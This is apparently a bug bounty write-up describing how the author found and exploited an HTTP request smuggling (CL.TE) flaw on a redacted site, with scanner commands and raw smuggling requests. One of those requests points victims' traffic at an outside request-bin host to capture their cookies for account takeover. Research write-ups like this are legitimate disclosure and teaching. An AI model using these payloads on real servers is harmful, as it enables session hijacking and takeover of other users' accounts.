Introduction
Peace be upon you all, this is actually my first writeup which is going to be about a very interesting vulnerability, HTTP Request Smuggling, which I found in a private program, which I was able to escalate it to full account takeover. I am going to share with you how to search for this vulnerability on a large scale and what the best tool and resource to utilize when testing for this vulnerability.
It begins almost when the amazing researcher James kettle announce his new research at DEFCON, which addresses a new era of the HTTP request smuggling but this time for HTTP/2. I watched the video, and I couldn’t understand anything, So I went back and studied the previous version of this attack, and I thought what about testing this “rare attack” as some people think, before moving to the new one. I ended up finding this critical vulnerability in two different private programs.
About HTTP Request Smuggling
HTTP request smuggling is an attack in which an attacker interferes with the processing of a sequence of HTTP requests that a web application receives from one or more users. Vulnerabilities related to HTTP request smuggling are often critical, allowing an attacker to bypass security measures, gain unauthorized access to sensitive data, and directly compromise the information of other users of the application.
I am not going to cover it here because Portswigger did a really good job at explaining this with practical Labs.
https://portswigger.net/web-security/request-smuggling
Methodology
After you have learned about the vulnerability, you can start looking for it in some bug bounty programs. You have two methods but remember you need to test this with caution because it is very harmful:
1.Using the HTTP Request Smuggling Burp Extension, either the burp community or pro. You can widen your scope by adding more subdomains and URLs, selecting them all, and from the extension tab, clicking smuggle probe.
2. Using smuggler.py tool which is a command line tool that replicate almost the same process of the burp extension.
1
2
3
4
5
# Single Host:
python3 smuggler.py -u <URL>
# List of hosts:
cat list_of_hosts.txt | python3 smuggler.py
Note: These scanners will not guarantee the existence of vulnerabilities; there are false positives, so you need to validate every finding of any of these tools.
The Finding
Since it is a private program, we are going to name it as readcted.com I started by collecting some subdomains, then I fed all those subdomains to burp and started to crawl the website. Then I run the burp extension scanner in all the subdomains. And after some time, I found this issue on my target tab.
It is a CT.TE Here, the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. this information is very important to be able to exploit the vulnerability.
Validating
I started now to validate if the vulnerability exits or it is just a false positive. I sent the following request:
1
2
3
4
5
6
7
8
9
10
11
12
POST / HTTP/1.1
Host: subdoamin.readcted.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Transfer-Encoding: chunked
Transfer-encoding: identity
1
A
0
which successfully triggers a connection time out indicating the backend server process the transfer encoding header. Now it is the time to exploit it.
Exploiting
To exploit HTTP Request Smuggling Vulnerability you have to use turbo intruder to be able to send concurrent request and to receive the smuggled one before it reach the user. we will send the following request:
1
2
3
4
5
6
7
8
9
10
11
12
POST / HTTP/1.1
Host: redacted.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Transfer-Encoding: chunked
Transfer-encoding: identity
0
GET /video HTTP/1.1
Foo: x
We manged to send the smuggled request to /video to be able to disrupt the user experience by smuggle a not found web page. then we will chose smuggle attack CL.TE form the extension tab and then click attack.
Great! now we confirmed that the vulnerability exists and can disrupt the user experience who browse the website to redirect him to a not found page. but still we need to escalate this vulnerability to something else. as you know HTTP Request smuggling can lead to many vulnerabilities but still we need anther harmless vulnerability like Self XSS or Open redirection to be able to escalate our attack. I manged to search for Self XSS but unfortunately I didn’t find. Let’s search for an open redirected.
Harmless Open Redirect
what we need to find is an open redirection to be able to redirect the user traffic with their own cookie to our server. we have found before a local redirection which is if the website isn’t found it will make a redirection like the following:
The problem is that the redirection is locally in the website and we need an external one. but what if change the host header to something else?!
BINGO!! almost all the companies will not accept this vulnerability per se but by combining this with HTTP Request Smuggling we will do Magic!
Escalating to Full Account takeover
Now let’s craft our request that will be smuggled to send our malicious one. I will use request bin to poison the response queue and receive users responses into my endpoint. The payload will look like the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
POST / HTTP/1.1
Host: redacted.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Transfer-Encoding: chunked
Transfer-encoding: identity
0
GET /video HTTP/1.1
Host: enfliy4kmrr8i.x.pipedream.net
Foo: x
And then pass our request to the turbo intruder to start our attack:
Okay, the attack worked. Now let’s go back to our the endpoint to see what’s happened.
BOOM!! My endpoint is flooding with requests (other users responses) that contain cookies. Now, I can fully take over any account that is browsing the website.
Conclusion
I have reported this, and they are working on a fix at the current moment. The sad story is that this report has been closed as a duplicate, but I was able to find the same technique on another website and received a 4-digit bounty as a reward.
I hope you enjoyed reading this, and if you have any questions, feel free to ping me any time, Happy Hunting!